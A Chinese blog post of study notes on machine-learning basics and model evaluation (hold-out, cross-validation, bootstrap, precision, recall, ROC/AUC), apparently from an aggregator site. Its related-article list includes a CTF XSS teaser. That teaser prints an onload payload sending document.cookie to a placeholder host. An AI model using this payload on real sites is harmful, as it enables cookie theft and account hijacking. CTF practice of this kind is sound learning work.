机器学习(一)——基本概念、模型的评估与选择

news2024/11/13 18:45:22

目录

  • 1 关于
  • 2 概念
    • 2.1 基础概念
    • 2.2 学习过程
    • 2.3 预测与评估
    • 2.4 标记与分类
      • 2.4.1 标记
      • 2.4.2 分类
    • 2.5 回归分析
    • 2.6 聚类分析
    • 2.7 学习类型
    • 2.8 泛化能力
    • 2.9 统计学概念
  • 3 模型评估与选择
    • 3.1 经验误差与过拟合
    • 3.2 评估方法
      • 3.2.1 留出法
      • 3.2.2 交叉验证法
      • 3.2.3 自助法
      • 3.2.4 调参与最终模型
    • 3.3 性能度量


1 关于

本文是基于西瓜书(第一、二章)的学习记录。提供了机器学习领域的基础知识和概念的概述、模型评估与选择等内容。
西瓜书电子版:百度网盘分享链接


2 概念

2.1 基础概念

  • 记录:一组相关数据项的集合,描述了一个对象或实体的特定信息。
  • 数据集(data set):一组记录的集合,每条记录描述一个事件或对象。
  • 示例(instance)或样本(sample):数据集中的每条记录,代表一个具体的事件或对象。
  • 属性(attribute)或特征(feature):反映事件或对象在某方面的表现或性质的事项。
  • 属性值(attribute value):属性上的取值,例如“青绿”、“乌黑”。
  • 属性空间(attribute space)、样本空间(sample space)或输入空间:由属性张成的空间,用于描述对象。
  • 特征向量(feature vector):属性空间中的每个点对应一个坐标向量,因此一个示例也可以被称为一个特征向量。

2.2 学习过程

  • 学习(learning)或训练(training):从数据中学得模型的过程。
  • 学习算法(learning algorithm):执行学习或训练过程的算法。
  • 训练数据(training data):训练过程中使用的数据。
  • 训练样本(training sample):训练数据中的每个样本。
  • 训练集(training set):由训练样本组成的集合。
  • 假设(hypothesis):学得的模型,对应了关于数据的某种潜在规律。
  • 真相(ground-truth)或真实:潜在规律自身,学习过程的目的是找出或逼近真相。
  • 学习器(learner):有时将模型称为学习器,可看作学习算法在给定数据和参数空间上的实例化。

2.3 预测与评估

  • 预测(prediction):建立模型以帮助判断未剖开的西瓜是否为“好瓜”。
  • 测试(testing):使用学得的模型进行预测的过程。
  • 测试样本(testing sample):被预测的样本。

2.4 标记与分类

2.4.1 标记

  • 标记(label):关于示例结果的信息,如“好瓜”。
  • 样例(example):拥有标记信息的示例。
  • 样本:有时也将标记看作对象本身的一部分,此时“样例”也称为“样本”。

2.4.2 分类

  • 分类(classification):预测离散值的任务,例如“好瓜”“坏瓜”。
    • 二分类(binary classification):涉及两个类别的分类任务。
    • 多分类(multi-class classification):涉及多个类别的分类任务。
    • 正类(positive class):在二分类任务中,通常指定的一个类别。
    • 负类(negative class):在二分类任务中,非正类的类别。

2.5 回归分析

  • 回归(regression):预测连续值的任务,例如西瓜成熟度。

2.6 聚类分析

  • 聚类(clustering):将训练集中的西瓜分成若干组的过程,每组称为一个“簇”。
  • 簇(cluster):聚类过程中形成的组。

2.7 学习类型

  • 监督学习(supervised learning):基于训练数据拥有标记信息的学习任务。
  • 无监督学习(unsupervised learning):基于训练数据不拥有标记信息的学习任务。

2.8 泛化能力

  • 泛化(generalization)能力:学得模型适用于新样本的能力。
  • 新样本:未在训练集中出现的样本。

2.9 统计学概念

  • 分布(distribution):样本空间中全体样本服从的未知分布。
  • 独立同分布(independent and identically distributed, i.i.d.):每个样本都是独立地从分布上采样获得的。

3 模型评估与选择

3.1 经验误差与过拟合

  • 错误率:分类错误的样本数占样本总数的比例
  • 精度:精度= 1-错误率
  • 误差:学习器的实际预测输出与样本的真实输出之间的差异
  • 训练误差:学习器在训练集上的误差
  • 泛化误差:在新样本上的误差
  • 过拟合:当学习器把训练样本学得“太好” 了的时候,很可能已经把训练样本自身的一些特点当作了所有潜在样本都会具有的一般性质,这样就会导致泛化性能下降.
  • 欠拟合:指对训练样本的一般性质尚未学好.

3.2 评估方法

  • 通常,我们可通过实验测试来对学习器的泛化误差进行评估并进而做出选择.为此 需使用一个“测试集”(testing set)来测试学习器对新样本的判别能力,然后以测试集上的“测试误差”(testing error)作为泛化误差的近似。测试集应该尽可能与训练集互斥,即测试样本尽量不在训练集中出现、未在训练过程中使用过。

3.2.1 留出法

直接将数据集。划分为两个互斥的集合,其中一个集合作为训练集S ,另一个作为测试集T

  • 需注意的是,训练/测试集的划分要尽可能保持数据分布的一致性,避免因数据划分过程引入额外的偏差而对最终结果产生影响,例如在分类任务中至少要保持样本的类别比例相似
  • 单次使用留出法得到的估计结果往往不够稳定可靠,在使用留出法时,一般要采用若干次随机划分、重复进行实验评估后取平均值作为留出法的评估结果
  • 常见做法是将大约2/3〜 4/5的样本用于训练,剩余样本用于测试.

3.2.2 交叉验证法

先将数据集D 划分为k个大小相似的互斥子集,然后,每次用k - 1 个子集的并集作为训练集,余下的那个子集作为测试集;这样就可获得k组训练/测试集,从而可进行k次训练和测试,最终返回的是这k个测试结果的均值

  • 交叉验证法评估结果的稳定性和保真性在很大程度上取决于k的取值,为强调这一点,通常把交叉验证法称为“ k 折交叉验证”(k-fold cross validation), k最常用的取值是10 ,此时称为10折交叉验证
  • 示意图

3.2.3 自助法

每次随机从。中挑选一个样本,将其拷贝放入少 ,然后再将该样本放回初始数据集D 中,使得该样本在下次采样时仍有可能被采到;这个过程重复执行m次后,我们就得到了包含m个样本的数据集D

3.2.4 调参与最终模型

  • 除了要对适用学习算法进行选择,还需对算法参数进行设定,这就是通常所说的“参数调节”或简称“调参 "(parameter tuning).
  • 通常把学得模型在实际使用中遇到的数据称为测试数据,为了加以区分,模型评估与选择中用于评估测试的数据集常称为“验证集 "(validation set)。).例如,在研究对比不同算法的泛化性能时,我们用测试集上的判别效果来估计模型在实际使用时的泛化能力,而把训练数据另外划分为训练集和验证集,基于验证集上的性能来进行模型选择和调参.

3.3 性能度量

  • 均方误差(回归任务最常用)

  • 错误率:分类错误的样本数占样本总数的比例
  • 精度:是分类正确的样本数占样本总数的比例
  • 查准率:检索出的信息中有多少比例是用户感兴趣的。即预测为正类的样本中,实际为正类的比例
  • 查全率:用户感兴趣的信息中有多少被检索出来了。即在所有实际为正类的样本中,模型预测为正类的比例。
  • F1:查准率和查全率的调和平均数,它试图在两者之间找到一个平衡。
  • 一般来说,查准率高时,查全率往往偏低;而查全率高时,查准率往往偏低
  • P-R 曲线:根据学习器的预测结果对样例进行排序,排在前面的是学习器认为“最可能”是正例的样本,排在最后的则是学习器认为“最不可能”是正例的样本.按此顺序逐个把样本作为正例进行预测,则每次可以计算出当前的查全率、查准率.以查准率为纵轴、查全率为横轴作图,就得到了查准率-查全率曲线,简称 P-R曲线
    • 若一个学习器的P -R 曲线被另一个学习器的曲线完全“包住”,则可断言后者的性能优于前者
    • 比较P -R 曲线下面积的大小,它在一定程度上表征了学习器在查准率和查全率上取得相对“双高”的比例.

  • ROC 与 AUC:我们根据学习器的概率预测结果对样例进行排序,按此顺序逐个把样本作为正例进行预测,每次计算出两个重要量的值,分别以它们为横、纵坐标作图,就得到了 “ROC曲线”.ROC 曲线的纵轴是“真正例率”(True Positive Rate ,简称 TPR ) , 横轴是“假正例率”
    • 若一个学习器的ROC曲线被另一个学习器的曲线完全“包住"则可断言后者的性能优于前者;若两个学习器的ROC曲线发生交叉,则难以一般性地断言两者孰优孰劣.此时如果一定要进行比较,则较为合理的判据是比较ROC曲线下的面积,即AUC

  • 代价敏感错误:为权衡不同类型错误所造成的不同损失,可为错误赋予“非均等代价”

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2236552.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

第三十五章 Vue路由进阶之声明式导航(跳转传参)

目录 一、引言 二、查询参数传参 2.1. 使用方式 2.2. 完整代码 2.2.1. main.js 2.2.2. App.vue 2.2.3. Search.vue 2.2.4. Home.vue 2.2.5. index.js 三、动态路由传参 3.1. 使用方式 3.2. 完整代码 3.2.1. main.js 3.2.2. App.vue 3.2.3. Search.vue 3.2.4. Hom…

通过pin_memory 优化 PyTorch 数据加载和传输:工作原理、使用场景与性能分析

在 PyTorch 框架中,有一个看似简单的设置可以对模型性能产生重大影响: pin_memory。这个设置具体起到了什么作用,为什么需要关注它呢?如果你正在处理大规模数据集、实时推理或复杂的多 GPU 训练任务,将 pin_memory设为 True可以提高 CPU 与 GPU 之间的数据传输速度,有可能节…

博达S3956交换机批量配置接口导致设备重启

文章目录 现象厂家查看信息如下解决方法 现象 设备信息 交换机型号:博达S3956版本:2.2.0F Build 101150ROM版本:0.1.8 配置命令 interface range GigaEthernet0/1-40switchport pvid 10设备重启,配置未生效(批量配置…

【Linux】Ansible集中化运维工具(详解)安装、常用模块、playbook脚本

文章目录 一、Ansible安装及远程控制1、关闭防火墙和SELinux2、安装ansible3、配置SSH无密码登录1、在管理机上生成一对密钥2、将公钥下发到远程主机3、保管密钥 4、主机目录 二、常用模块1、setup模块2、copy模块3、file模块4、shell模块5、script模块6、ping模块7、group模块…

Mysql学习笔记(一):Mysql的架构

一、mysql的组成部分 下面是来自Mysql实战的图片,该图片很好的表示了mysql的组成 mysql架构图 我们主要是和server层打交道,该层由连接器,分析器,优化器执行器、(查询缓存)组成 二、连接器的作用 每个客户端…

题目:Wangzyy的卡牌游戏

登录 - XYOJ 思路: 使用动态规划,设dp[n]表示当前数字之和模三等于0的组合数。 状态转移方程:因为是模三,所以和的可能就只有0、1、2。等号右边的f和dp都表示当前一轮模三等于k的组合数。以第一行为例:等号右边表示 j转…

【实验10】卷积神经网络(1)卷积算子

目录​​​​​​​ 1 自定义二维卷积算子 2 自定义带步长和零填充的二维卷积算子 3 实现图像边缘检测 4 自定义卷积层算子和汇聚层算子 4.1卷积层: 4.2 汇聚层: 5 学习torch.nn.Conv2d()、torch.nn.MaxPool2d();torch.nn.avg_pool2d()&…

基于springboot信用分析管理系统设计与实现

项目描述 临近学期结束,还是毕业设计,你还在做java程序网络编程,期末作业,老师的作业要求觉得大了吗?不知道毕业设计该怎么办?网页功能的数量是否太多?没有合适的类型或系统?等等。这里根据疫情当下,你想解决的问…

用JavaScript、Nodejs写一个本地tcp服务,用于前端WebSocket调试

效果: 准备工作: 新建一个文件夹,在根目录安装依赖: npm install ws express 依赖介绍: WS是一个轻量级、高效的WebSocket库,适用于Node.js环境。 express 是一个流行的Node.js Web应用程序框架。 新…

golang分布式缓存项目 Day 1

注:该项目原作者:https://geektutu.com/post/geecache-day1.html。本文旨在记录本人做该项目时的一些疑惑解答以及部分的测试样例以便于本人复习。 LRU缓存淘汰策略 三种缓存淘汰策略 FIFO(First In, First Out)先进先出 原理&…

论文阅读笔记:Depth Pro: Sharp Monocular Metric Depth in Less Than a Second

论文阅读笔记:Depth Pro: Sharp Monocular Metric Depth in Less Than a Second 1 背景1.1 动机1.2 提出的方法 2 创新点3 方法4 模块4.1 训练目标4.2 课程训练 4.3 边缘评价指标4.4 焦距估计 5 效果5.1 和SOTA方法的对比 论文:https://arxiv.org/abs/24…

Python练习13

Python日常练习 题目: 请编写fun函数,其功能是打印杨辉三角形。杨辉三角行如图所示: 1 1 1 1 2 1 1 3 3 1 1 4 6 4 1 要求: 采用列表函数完成 -----------------------------------…

第18篇 :深入剖析systemverilog中 randomize 失败案例启示录(一)

经过前面章节的理论学习,我们对systemverilog中的随机约束,有一定的了解,那么,今天开始,着重讲述一些工作中遇到的困惑。主要通过一些例子,层层递进,举一反三,源于实践,剖…

ArcGIS软件之“计算面积几何”地图制作

一、消防站的泰森多边形 效果图: 二、人口调查的泰森多边形 确定后效果图: 三、人口调查的泰森多边形属性设置 确定后的效果图: 四、计算面积几何,用于求密度 先添加字段area_1,然后设置浮点型及字段属性 五…

ctfshow(319->326)--XSS漏洞--反射型XSS

Web319 思路 先测试过滤&#xff0c;发现过滤了script、img&#xff0c;没有过滤body&#xff0c;svg payload: <body onload"location.hrefhttp://xx.xx.xx.xx/flag.php?cookiedocument.cookie"/><svg onload"location.hrefhttp://xx.xx.xx.xx/fla…

大数据新视界 -- 大数据大厂之 Impala 性能优化:融合机器学习的未来之路(上 (2-2))(11/30)

&#x1f496;&#x1f496;&#x1f496;亲爱的朋友们&#xff0c;热烈欢迎你们来到 青云交的博客&#xff01;能与你们在此邂逅&#xff0c;我满心欢喜&#xff0c;深感无比荣幸。在这个瞬息万变的时代&#xff0c;我们每个人都在苦苦追寻一处能让心灵安然栖息的港湾。而 我的…

数据结构-并查集专题(2)

一、前言 接&#xff08;1&#xff09;完成剩余题目和了解并查集运用求解最小生成树的Kruskal算法 二、专题训练 2.1 题目总览 前四题见&#xff08;1&#xff09; 2.2 1568: 并查集-家谱 思路 首先这个题目的描述就有问题&#xff0c;它说每一组的父子关系由两行组成&…

【销帮帮-注册_登录安全分析报告-试用页面存在安全隐患】

联通支付注册/登录安全分析报告 前言 由于网站注册入口容易被黑客攻击&#xff0c;存在如下安全问题&#xff1a; 暴力破解密码&#xff0c;造成用户信息泄露短信盗刷的安全问题&#xff0c;影响业务及导致用户投诉带来经济损失&#xff0c;尤其是后付费客户&#xff0c;风险巨…

中安OCR电子行驶证、驾驶证识别,助力便捷出行与智慧交通

随着数字化技术在各行各业的深入应用&#xff0c;交通管理领域也迈入了新的时代。OCR电子行驶证和电子驾驶证的推出&#xff0c;不仅提升了车辆及驾驶证件管理的效率&#xff0c;更大大方便了车主出行。电子证件的普及&#xff0c;使得交通管理从“实体化”逐渐走向“数字化”&…

《深度学习神经网络:颠覆生活的魔法科技与未来发展新航向》

深度学习神经网络对我们生活的影响 一、医疗领域 深度学习神经网络在医疗领域的应用可谓意义重大。在疾病诊断方面&#xff0c;它能够精准分析医疗影像&#xff0c;如通过对大量的 CT、MRI 图像进行深度学习&#xff0c;快速准确地识别出微小的肿瘤病变&#xff0c;为医生提供…